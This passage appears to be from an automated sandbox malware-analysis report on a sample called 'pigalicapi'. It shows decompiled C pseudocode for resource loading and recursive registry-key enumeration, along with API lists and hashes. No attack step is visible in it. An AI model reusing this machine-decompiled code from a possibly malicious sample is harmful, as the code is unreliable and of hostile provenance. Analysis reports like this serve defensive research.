                                                                                                                                                                                                                                                                                          									goto L12;
                                                                                                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                                                                                                          									 *_t122 = 0;
                                                                                                                                                                                                                                                                                          									_t96 = WideCharToMultiByte(3, 0, _t101, 0xffffffff, _t122, _t128, 0, 0);
                                                                                                                                                                                                                                                                                          									asm("sbb eax, eax");
                                                                                                                                                                                                                                                                                          									_t74 =  ~_t96 & _t122;
                                                                                                                                                                                                                                                                                          									_t120 = _v1056;
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          								L13:
                                                                                                                                                                                                                                                                                          								if(_t74 != 0) {
                                                                                                                                                                                                                                                                                          									_t101 = LoadLibraryExA(_t74, 0, 2);
                                                                                                                                                                                                                                                                                          									_v1076 = _t101;
                                                                                                                                                                                                                                                                                          									__eflags = _t101;
                                                                                                                                                                                                                                                                                          									if(_t101 != 0) {
                                                                                                                                                                                                                                                                                          										_t115 = _v1064;
                                                                                                                                                                                                                                                                                          										_t129 = FindResourceA(_t101, _v1060, _v1064);
                                                                                                                                                                                                                                                                                          										__eflags = _t129;
                                                                                                                                                                                                                                                                                          										if(_t129 != 0) {
                                                                                                                                                                                                                                                                                          											_t78 = LoadResource(_t101, _t129);
                                                                                                                                                                                                                                                                                          											_v1064 = _t78;
                                                                                                                                                                                                                                                                                          											__eflags = _t78;
                                                                                                                                                                                                                                                                                          											if(_t78 != 0) {
                                                                                                                                                                                                                                                                                          												_t128 = SizeofResource(_t101, _t129);
                                                                                                                                                                                                                                                                                          												_t34 = _t128 + 1; // 0x1
                                                                                                                                                                                                                                                                                          												_t80 = _t34;
                                                                                                                                                                                                                                                                                          												_v1060 = _t128;
                                                                                                                                                                                                                                                                                          												__eflags = _t80 - _t128;
                                                                                                                                                                                                                                                                                          												if(_t80 >= _t128) {
                                                                                                                                                                                                                                                                                          													__eflags = 0;
                                                                                                                                                                                                                                                                                          													_v8 = 2;
                                                                                                                                                                                                                                                                                          													if(0 > 0) {
                                                                                                                                                                                                                                                                                          														L32:
                                                                                                                                                                                                                                                                                          														_push(0x80070216);
                                                                                                                                                                                                                                                                                          														_t80 = L00801170(_t115);
                                                                                                                                                                                                                                                                                          													} else {
                                                                                                                                                                                                                                                                                          														__eflags = _t80 - 0xffffffff;
                                                                                                                                                                                                                                                                                          														if(_t80 > 0xffffffff) {
                                                                                                                                                                                                                                                                                          															goto L32;
                                                                                                                                                                                                                                                                                          														}
                                                                                                                                                                                                                                                                                          													}
                                                                                                                                                                                                                                                                                          													__eflags = _t80 - 0x400;
                                                                                                                                                                                                                                                                                          													if(__eflags <= 0) {
                                                                                                                                                                                                                                                                                          														_v1052 =  &_v1048;
                                                                                                                                                                                                                                                                                          													} else {
                                                                                                                                                                                                                                                                                          														E0080FF60(_t80, _t115, _t120, _t128, __eflags,  &_v1052);
                                                                                                                                                                                                                                                                                          													}
                                                                                                                                                                                                                                                                                          													_v8 = 1;
                                                                                                                                                                                                                                                                                          													_t81 = _v1052;
                                                                                                                                                                                                                                                                                          													__eflags = _t81;
                                                                                                                                                                                                                                                                                          													if(_t81 != 0) {
                                                                                                                                                                                                                                                                                          														E00801190(_t128, _v1064, _t128, _t81);
                                                                                                                                                                                                                                                                                          														_t133 =  &(_t133[4]);
                                                                                                                                                                                                                                                                                          														 *((char*)(_v1052 + _t128)) = 0;
                                                                                                                                                                                                                                                                                          														_t85 = E00803650( &_v1072, _v1052, __eflags, _a12);
                                                                                                                                                                                                                                                                                          														goto L40;
                                                                                                                                                                                                                                                                                          													} else {
                                                                                                                                                                                                                                                                                          														_v1056 = 0x8007000e;
                                                                                                                                                                                                                                                                                          													}
                                                                                                                                                                                                                                                                                          												} else {
                                                                                                                                                                                                                                                                                          													_v1056 = 0x8007000e;
                                                                                                                                                                                                                                                                                          												}
                                                                                                                                                                                                                                                                                          											} else {
                                                                                                                                                                                                                                                                                          												_t85 = E008013E0();
                                                                                                                                                                                                                                                                                          												goto L40;
                                                                                                                                                                                                                                                                                          											}
                                                                                                                                                                                                                                                                                          										} else {
                                                                                                                                                                                                                                                                                          											_t85 = E008013E0();
                                                                                                                                                                                                                                                                                          											L40:
                                                                                                                                                                                                                                                                                          											_v1056 = _t85;
                                                                                                                                                                                                                                                                                          										}
                                                                                                                                                                                                                                                                                          										FreeLibrary(_t101);
                                                                                                                                                                                                                                                                                          										_t103 = _v1056;
                                                                                                                                                                                                                                                                                          									} else {
                                                                                                                                                                                                                                                                                          										_t103 = E008013E0();
                                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                                          									_t115 =  &_v1048;
                                                                                                                                                                                                                                                                                          									__eflags = _v1052 -  &_v1048;
                                                                                                                                                                                                                                                                                          									if(_v1052 !=  &_v1048) {
                                                                                                                                                                                                                                                                                          										E0080D040( &_v1052);
                                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                                          									__eflags = _t120;
                                                                                                                                                                                                                                                                                          									if(_t120 != 0) {
                                                                                                                                                                                                                                                                                          										while(1) {
                                                                                                                                                                                                                                                                                          											_t130 =  *_t120;
                                                                                                                                                                                                                                                                                          											_v1056 = _t130;
                                                                                                                                                                                                                                                                                          											E00815DE2(_t120);
                                                                                                                                                                                                                                                                                          											_t133 =  &(_t133[4]);
                                                                                                                                                                                                                                                                                          											__eflags = _t130;
                                                                                                                                                                                                                                                                                          											if(_t130 == 0) {
                                                                                                                                                                                                                                                                                          												goto L48;
                                                                                                                                                                                                                                                                                          											}
                                                                                                                                                                                                                                                                                          											_t120 = _v1056;
                                                                                                                                                                                                                                                                                          										}
                                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                                          									L48:
                                                                                                                                                                                                                                                                                          									_t65 = _t103;
                                                                                                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                                                                                                          									_t124 = 0;
                                                                                                                                                                                                                                                                                          									goto L15;
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				 *[fs:0x0] = _v16;
                                                                                                                                                                                                                                                                                          				_pop(_t121);
                                                                                                                                                                                                                                                                                          				_pop(_t125);
                                                                                                                                                                                                                                                                                          				_pop(_t102);
                                                                                                                                                                                                                                                                                          				return E008159E6(_t65, _t102, _v24 ^ _t131, _t115, _t121, _t125);
                                                                                                                                                                                                                                                                                          			}















































                                                                                                                                                                                                                                                                                          0x008021a0
                                                                                                                                                                                                                                                                                          0x008021a0
                                                                                                                                                                                                                                                                                          0x008021a3
                                                                                                                                                                                                                                                                                          0x008021a5
                                                                                                                                                                                                                                                                                          0x008021b0
                                                                                                                                                                                                                                                                                          0x008021b1
                                                                                                                                                                                                                                                                                          0x008021b7
                                                                                                                                                                                                                                                                                          0x008021bc
                                                                                                                                                                                                                                                                                          0x008021be
                                                                                                                                                                                                                                                                                          0x008021c4
                                                                                                                                                                                                                                                                                          0x008021c8
                                                                                                                                                                                                                                                                                          0x008021ce
                                                                                                                                                                                                                                                                                          0x008021d4
                                                                                                                                                                                                                                                                                          0x008021d7
                                                                                                                                                                                                                                                                                          0x008021d9
                                                                                                                                                                                                                                                                                          0x008021df
                                                                                                                                                                                                                                                                                          0x008021e5
                                                                                                                                                                                                                                                                                          0x008021e7
                                                                                                                                                                                                                                                                                          0x008021ed
                                                                                                                                                                                                                                                                                          0x008021f0
                                                                                                                                                                                                                                                                                          0x008021f6
                                                                                                                                                                                                                                                                                          0x008021fc
                                                                                                                                                                                                                                                                                          0x00802202
                                                                                                                                                                                                                                                                                          0x00802208
                                                                                                                                                                                                                                                                                          0x008022bf
                                                                                                                                                                                                                                                                                          0x008022cb
                                                                                                                                                                                                                                                                                          0x008022d3
                                                                                                                                                                                                                                                                                          0x008022d3
                                                                                                                                                                                                                                                                                          0x008022da
                                                                                                                                                                                                                                                                                          0x008022e6
                                                                                                                                                                                                                                                                                          0x008022e6
                                                                                                                                                                                                                                                                                          0x008022e9
                                                                                                                                                                                                                                                                                          0x008022ef
                                                                                                                                                                                                                                                                                          0x008022f4
                                                                                                                                                                                                                                                                                          0x008022f9
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x008022e0
                                                                                                                                                                                                                                                                                          0x008022e0
                                                                                                                                                                                                                                                                                          0x008022e6
                                                                                                                                                                                                                                                                                          0x008022fb
                                                                                                                                                                                                                                                                                          0x008022fb
                                                                                                                                                                                                                                                                                          0x0080220e
                                                                                                                                                                                                                                                                                          0x0080220f
                                                                                                                                                                                                                                                                                          0x00802216
                                                                                                                                                                                                                                                                                          0x00802217
                                                                                                                                                                                                                                                                                          0x00802219
                                                                                                                                                                                                                                                                                          0x0080221d
                                                                                                                                                                                                                                                                                          0x00802221
                                                                                                                                                                                                                                                                                          0x00802226
                                                                                                                                                                                                                                                                                          0x00802228
                                                                                                                                                                                                                                                                                          0x0080222e
                                                                                                                                                                                                                                                                                          0x008022b7
                                                                                                                                                                                                                                                                                          0x008022b7
                                                                                                                                                                                                                                                                                          0x008022b7
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00802239
                                                                                                                                                                                                                                                                                          0x0080223f
                                                                                                                                                                                                                                                                                          0x0080225c
                                                                                                                                                                                                                                                                                          0x00802261
                                                                                                                                                                                                                                                                                          0x00802264
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x0080226a
                                                                                                                                                                                                                                                                                          0x0080226a
                                                                                                                                                                                                                                                                                          0x0080226e
                                                                                                                                                                                                                                                                                          0x00802273
                                                                                                                                                                                                                                                                                          0x00802276
                                                                                                                                                                                                                                                                                          0x00802278
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x0080227a
                                                                                                                                                                                                                                                                                          0x0080227a
                                                                                                                                                                                                                                                                                          0x00802280
                                                                                                                                                                                                                                                                                          0x00802286
                                                                                                                                                                                                                                                                                          0x00802286
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00802286
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00802278
                                                                                                                                                                                                                                                                                          0x00802241
                                                                                                                                                                                                                                                                                          0x00802242
                                                                                                                                                                                                                                                                                          0x00802247
                                                                                                                                                                                                                                                                                          0x0080224c
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x0080224e
                                                                                                                                                                                                                                                                                          0x00802250
                                                                                                                                                                                                                                                                                          0x00802255
                                                                                                                                                                                                                                                                                          0x00802258
                                                                                                                                                                                                                                                                                          0x00802289
                                                                                                                                                                                                                                                                                          0x0080228b
                                                                                                                                                                                                                                                                                          0x008022b1
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x0080228d
                                                                                                                                                                                                                                                                                          0x0080229a
                                                                                                                                                                                                                                                                                          0x0080229d
                                                                                                                                                                                                                                                                                          0x008022a5
                                                                                                                                                                                                                                                                                          0x008022a7
                                                                                                                                                                                                                                                                                          0x008022a9
                                                                                                                                                                                                                                                                                          0x008022a9
                                                                                                                                                                                                                                                                                          0x008022b9
                                                                                                                                                                                                                                                                                          0x008022bb
                                                                                                                                                                                                                                                                                          0x00802310
                                                                                                                                                                                                                                                                                          0x00802312
                                                                                                                                                                                                                                                                                          0x00802318
                                                                                                                                                                                                                                                                                          0x0080231a
                                                                                                                                                                                                                                                                                          0x00802328
                                                                                                                                                                                                                                                                                          0x0080233d
                                                                                                                                                                                                                                                                                          0x0080233f
                                                                                                                                                                                                                                                                                          0x00802341
                                                                                                                                                                                                                                                                                          0x0080234f
                                                                                                                                                                                                                                                                                          0x00802355
                                                                                                                                                                                                                                                                                          0x0080235b
                                                                                                                                                                                                                                                                                          0x0080235d
                                                                                                                                                                                                                                                                                          0x00802371
                                                                                                                                                                                                                                                                                          0x00802373
                                                                                                                                                                                                                                                                                          0x00802373
                                                                                                                                                                                                                                                                                          0x00802376
                                                                                                                                                                                                                                                                                          0x0080237c
                                                                                                                                                                                                                                                                                          0x0080237e
                                                                                                                                                                                                                                                                                          0x0080238f
                                                                                                                                                                                                                                                                                          0x00802391
                                                                                                                                                                                                                                                                                          0x00802395
                                                                                                                                                                                                                                                                                          0x0080239c
                                                                                                                                                                                                                                                                                          0x0080239c
                                                                                                                                                                                                                                                                                          0x008023a1
                                                                                                                                                                                                                                                                                          0x00802397
                                                                                                                                                                                                                                                                                          0x00802397
                                                                                                                                                                                                                                                                                          0x0080239a
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x0080239a
                                                                                                                                                                                                                                                                                          0x008023a6
                                                                                                                                                                                                                                                                                          0x008023ab
                                                                                                                                                                                                                                                                                          0x008023e2
                                                                                                                                                                                                                                                                                          0x008023ad
                                                                                                                                                                                                                                                                                          0x008023b4
                                                                                                                                                                                                                                                                                          0x008023b4
                                                                                                                                                                                                                                                                                          0x008023e8
                                                                                                                                                                                                                                                                                          0x008023ef
                                                                                                                                                                                                                                                                                          0x008023f5
                                                                                                                                                                                                                                                                                          0x008023f7
                                                                                                                                                                                                                                                                                          0x00802410
                                                                                                                                                                                                                                                                                          0x0080241e
                                                                                                                                                                                                                                                                                          0x00802421
                                                                                                                                                                                                                                                                                          0x00802432
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x008023f9
                                                                                                                                                                                                                                                                                          0x008023f9
                                                                                                                                                                                                                                                                                          0x008023f9
                                                                                                                                                                                                                                                                                          0x00802380
                                                                                                                                                                                                                                                                                          0x00802380
                                                                                                                                                                                                                                                                                          0x00802380
                                                                                                                                                                                                                                                                                          0x0080235f
                                                                                                                                                                                                                                                                                          0x0080235f
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x0080235f
                                                                                                                                                                                                                                                                                          0x00802343
                                                                                                                                                                                                                                                                                          0x00802343
                                                                                                                                                                                                                                                                                          0x00802437
                                                                                                                                                                                                                                                                                          0x00802437
                                                                                                                                                                                                                                                                                          0x00802437
                                                                                                                                                                                                                                                                                          0x0080243e
                                                                                                                                                                                                                                                                                          0x00802444
                                                                                                                                                                                                                                                                                          0x0080231c
                                                                                                                                                                                                                                                                                          0x00802321
                                                                                                                                                                                                                                                                                          0x00802321
                                                                                                                                                                                                                                                                                          0x0080244a
                                                                                                                                                                                                                                                                                          0x00802450
                                                                                                                                                                                                                                                                                          0x00802456
                                                                                                                                                                                                                                                                                          0x0080245e
                                                                                                                                                                                                                                                                                          0x0080245e
                                                                                                                                                                                                                                                                                          0x00802463
                                                                                                                                                                                                                                                                                          0x00802465
                                                                                                                                                                                                                                                                                          0x00802476
                                                                                                                                                                                                                                                                                          0x00802476
                                                                                                                                                                                                                                                                                          0x00802479
                                                                                                                                                                                                                                                                                          0x0080247f
                                                                                                                                                                                                                                                                                          0x00802484
                                                                                                                                                                                                                                                                                          0x00802487
                                                                                                                                                                                                                                                                                          0x00802489
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00802470
                                                                                                                                                                                                                                                                                          0x00802470
                                                                                                                                                                                                                                                                                          0x00802476
                                                                                                                                                                                                                                                                                          0x0080248b
                                                                                                                                                                                                                                                                                          0x0080248b
                                                                                                                                                                                                                                                                                          0x008022bd
                                                                                                                                                                                                                                                                                          0x008022bd
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x008022bd
                                                                                                                                                                                                                                                                                          0x008022bb
                                                                                                                                                                                                                                                                                          0x0080224c
                                                                                                                                                                                                                                                                                          0x0080223f
                                                                                                                                                                                                                                                                                          0x0080222e
                                                                                                                                                                                                                                                                                          0x00802496
                                                                                                                                                                                                                                                                                          0x0080249e
                                                                                                                                                                                                                                                                                          0x0080249f
                                                                                                                                                                                                                                                                                          0x008024a0
                                                                                                                                                                                                                                                                                          0x008024ae

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • lstrlenW.KERNEL32(00000000,DA7E2511,00000001,00000000,00000000), ref: 0080220F
                                                                                                                                                                                                                                                                                          • _malloc.LIBCMT ref: 0080226E
                                                                                                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000003,00000000,00000000,000000FF,00000008,00000001,00000000,00000000), ref: 0080229D
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000001.00000002.711552533.0000000000801000.00000020.00000001.01000000.00000006.sdmp, Offset: 00800000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.711459674.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.712110114.0000000000820000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.712110114.0000000000830000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.712946985.0000000000869000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.713011724.000000000086C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.713140868.0000000000880000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.713182892.0000000000883000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_800000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: ByteCharMultiWide_malloclstrlen
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 2576735857-0
                                                                                                                                                                                                                                                                                          • Opcode ID: f37991d68d4330a6be36ccf094dcc3ab7c2210628040b05abfdc0d234408f37e
                                                                                                                                                                                                                                                                                          • Instruction ID: c8340e17853d5c0436c5f8f64cf21e524e2e2d390e4cac51cd28d12b0f585069
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f37991d68d4330a6be36ccf094dcc3ab7c2210628040b05abfdc0d234408f37e
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F381B5B1D006288BCB619B54CC89B9DB7B8FF44710F1081AAE909E7391D7B49E818FD9
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • SetLastError.KERNEL32(0000007F), ref: 02B514DB
                                                                                                                                                                                                                                                                                          • SetLastError.KERNEL32(0000007F), ref: 02B51507
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000001.00000002.718905728.0000000002B51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B51000, based on PE: false
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_2b51000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: ErrorLast
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 1452528299-0
                                                                                                                                                                                                                                                                                          • Opcode ID: a78bbaae607500b6fc2ff59280439e71286d67b81d86e62796e7b6bd84eed7f0
                                                                                                                                                                                                                                                                                          • Instruction ID: aaeb0d572ba31d1f945e04d1b156cc622376c65d7f1d3c61fdfd77de1290ecd0
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a78bbaae607500b6fc2ff59280439e71286d67b81d86e62796e7b6bd84eed7f0
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1D71C474E10219EFDB08DF98C590BADB7F2FF48304F648598D91AAB341D734AA41CB90
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 92%
                                                                                                                                                                                                                                                                                          			E00801920(void** __ecx, char* _a4) {
                                                                                                                                                                                                                                                                                          				signed int _v12;
                                                                                                                                                                                                                                                                                          				char _v272;
                                                                                                                                                                                                                                                                                          				void* _v276;
                                                                                                                                                                                                                                                                                          				int _v280;
                                                                                                                                                                                                                                                                                          				int _v284;
                                                                                                                                                                                                                                                                                          				int _v288;
                                                                                                                                                                                                                                                                                          				int _v292;
                                                                                                                                                                                                                                                                                          				char* _v296;
                                                                                                                                                                                                                                                                                          				struct _FILETIME _v304;
                                                                                                                                                                                                                                                                                          				void* __ebx;
                                                                                                                                                                                                                                                                                          				void* __edi;
                                                                                                                                                                                                                                                                                          				void* __esi;
                                                                                                                                                                                                                                                                                          				signed int _t36;
                                                                                                                                                                                                                                                                                          				long _t40;
                                                                                                                                                                                                                                                                                          				long _t44;
                                                                                                                                                                                                                                                                                          				void* _t48;
                                                                                                                                                                                                                                                                                          				void* _t51;
                                                                                                                                                                                                                                                                                          				void* _t52;
                                                                                                                                                                                                                                                                                          				void* _t66;
                                                                                                                                                                                                                                                                                          				void* _t73;
                                                                                                                                                                                                                                                                                          				char* _t77;
                                                                                                                                                                                                                                                                                          				void* _t80;
                                                                                                                                                                                                                                                                                          				signed int _t82;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_t36 =  *0x869060; // 0xda7e2511
                                                                                                                                                                                                                                                                                          				_v12 = _t36 ^ _t82;
                                                                                                                                                                                                                                                                                          				_t77 = _a4;
                                                                                                                                                                                                                                                                                          				_t80 = __ecx;
                                                                                                                                                                                                                                                                                          				_v296 = _t77;
                                                                                                                                                                                                                                                                                          				_v288 = 0;
                                                                                                                                                                                                                                                                                          				_v284 = 0;
                                                                                                                                                                                                                                                                                          				_v280 = 0;
                                                                                                                                                                                                                                                                                          				_v276 = 0;
                                                                                                                                                                                                                                                                                          				_t40 = RegOpenKeyExA( *__ecx, _t77, 0, __ecx[1] | 0x0002001f,  &_v276);
                                                                                                                                                                                                                                                                                          				_t66 = _v288;
                                                                                                                                                                                                                                                                                          				_t62 = _t40;
                                                                                                                                                                                                                                                                                          				if(_t40 != 0) {
                                                                                                                                                                                                                                                                                          					L4:
                                                                                                                                                                                                                                                                                          					if(_t66 != 0) {
                                                                                                                                                                                                                                                                                          						RegCloseKey(_t66);
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					return E008159E6(_t62, _t62, _v12 ^ _t82, _t77, _t80, 0);
                                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                                          					_t44 = 0;
                                                                                                                                                                                                                                                                                          					if(_t66 != 0) {
                                                                                                                                                                                                                                                                                          						_t44 = RegCloseKey(_t66);
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					_t66 = _v276;
                                                                                                                                                                                                                                                                                          					_v284 = 0;
                                                                                                                                                                                                                                                                                          					_t62 = _t44;
                                                                                                                                                                                                                                                                                          					_v288 = _t66;
                                                                                                                                                                                                                                                                                          					if(_t44 == 0) {
                                                                                                                                                                                                                                                                                          						_t63 = RegEnumKeyExA;
                                                                                                                                                                                                                                                                                          						_t78 =  &_v292;
                                                                                                                                                                                                                                                                                          						_v292 = 0x100;
                                                                                                                                                                                                                                                                                          						if(RegEnumKeyExA(_t66, 0,  &_v272,  &_v292, 0, 0, 0,  &_v304) != 0) {
                                                                                                                                                                                                                                                                                          							L11:
                                                                                                                                                                                                                                                                                          							_t48 = _v288;
                                                                                                                                                                                                                                                                                          							if(_t48 != 0) {
                                                                                                                                                                                                                                                                                          								RegCloseKey(_t48);
                                                                                                                                                                                                                                                                                          								_v288 = 0;
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          							_t63 = _v296;
                                                                                                                                                                                                                                                                                          							_v284 = 0;
                                                                                                                                                                                                                                                                                          							_t80 = E00801740(_t80, _v296);
                                                                                                                                                                                                                                                                                          							_t51 = _v288;
                                                                                                                                                                                                                                                                                          							if(_t51 != 0) {
                                                                                                                                                                                                                                                                                          								RegCloseKey(_t51);
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          							_t52 = _t80;
                                                                                                                                                                                                                                                                                          							goto L16;
                                                                                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                                                                                          							while(1) {
                                                                                                                                                                                                                                                                                          								_t52 = E00801920( &_v288,  &_v272);
                                                                                                                                                                                                                                                                                          								_v276 = _t52;
                                                                                                                                                                                                                                                                                          								if(_t52 != 0) {
                                                                                                                                                                                                                                                                                          									break;
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          								_t78 = _v288;
                                                                                                                                                                                                                                                                                          								_v292 = 0x100;
                                                                                                                                                                                                                                                                                          								if(RegEnumKeyExA(_v288, 0,  &_v272,  &_v292, 0, 0, 0,  &_v304) == 0) {
                                                                                                                                                                                                                                                                                          									continue;
                                                                                                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                                                                                                          									goto L11;
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          								goto L19;
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          							_t73 = _v288;
                                                                                                                                                                                                                                                                                          							if(_t73 == 0) {
                                                                                                                                                                                                                                                                                          								L16:
                                                                                                                                                                                                                                                                                          								return E008159E6(_t52, _t63, _v12 ^ _t82, _t78, _t80, 0);
                                                                                                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                                                                                                          								RegCloseKey(_t73);
                                                                                                                                                                                                                                                                                          								return E008159E6(_v276, _t63, _v12 ^ _t82, _t78, _t80, 0);
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                                                                          						goto L4;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				L19:
                                                                                                                                                                                                                                                                                          			}


























                                                                                                                                                                                                                                                                                          0x00801929
                                                                                                                                                                                                                                                                                          0x00801930
                                                                                                                                                                                                                                                                                          0x00801933
                                                                                                                                                                                                                                                                                          0x00801939
                                                                                                                                                                                                                                                                                          0x00801952
                                                                                                                                                                                                                                                                                          0x00801958
                                                                                                                                                                                                                                                                                          0x0080195e
                                                                                                                                                                                                                                                                                          0x00801964
                                                                                                                                                                                                                                                                                          0x0080196a
                                                                                                                                                                                                                                                                                          0x00801970
                                                                                                                                                                                                                                                                                          0x00801976
                                                                                                                                                                                                                                                                                          0x0080197c
                                                                                                                                                                                                                                                                                          0x00801980
                                                                                                                                                                                                                                                                                          0x008019a7
                                                                                                                                                                                                                                                                                          0x008019a9
                                                                                                                                                                                                                                                                                          0x008019ac
                                                                                                                                                                                                                                                                                          0x008019ac
                                                                                                                                                                                                                                                                                          0x008019c4
                                                                                                                                                                                                                                                                                          0x00801982
                                                                                                                                                                                                                                                                                          0x00801982
                                                                                                                                                                                                                                                                                          0x00801986
                                                                                                                                                                                                                                                                                          0x00801989
                                                                                                                                                                                                                                                                                          0x00801989
                                                                                                                                                                                                                                                                                          0x0080198f
                                                                                                                                                                                                                                                                                          0x00801995
                                                                                                                                                                                                                                                                                          0x0080199b
                                                                                                                                                                                                                                                                                          0x0080199d
                                                                                                                                                                                                                                                                                          0x008019a5
                                                                                                                                                                                                                                                                                          0x008019c7
                                                                                                                                                                                                                                                                                          0x008019d7
                                                                                                                                                                                                                                                                                          0x008019e7
                                                                                                                                                                                                                                                                                          0x008019f5
                                                                                                                                                                                                                                                                                          0x00801a50
                                                                                                                                                                                                                                                                                          0x00801a50
                                                                                                                                                                                                                                                                                          0x00801a58
                                                                                                                                                                                                                                                                                          0x00801a5b
                                                                                                                                                                                                                                                                                          0x00801a61
                                                                                                                                                                                                                                                                                          0x00801a61
                                                                                                                                                                                                                                                                                          0x00801a67
                                                                                                                                                                                                                                                                                          0x00801a6f
                                                                                                                                                                                                                                                                                          0x00801a7a
                                                                                                                                                                                                                                                                                          0x00801a7c
                                                                                                                                                                                                                                                                                          0x00801a84
                                                                                                                                                                                                                                                                                          0x00801a87
                                                                                                                                                                                                                                                                                          0x00801a87
                                                                                                                                                                                                                                                                                          0x00801a8d
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x008019f7
                                                                                                                                                                                                                                                                                          0x00801a00
                                                                                                                                                                                                                                                                                          0x00801a0d
                                                                                                                                                                                                                                                                                          0x00801a12
                                                                                                                                                                                                                                                                                          0x00801a1a
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00801a27
                                                                                                                                                                                                                                                                                          0x00801a40
                                                                                                                                                                                                                                                                                          0x00801a4e
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00801a4e
                                                                                                                                                                                                                                                                                          0x00801aa2
                                                                                                                                                                                                                                                                                          0x00801aaa
                                                                                                                                                                                                                                                                                          0x00801a92
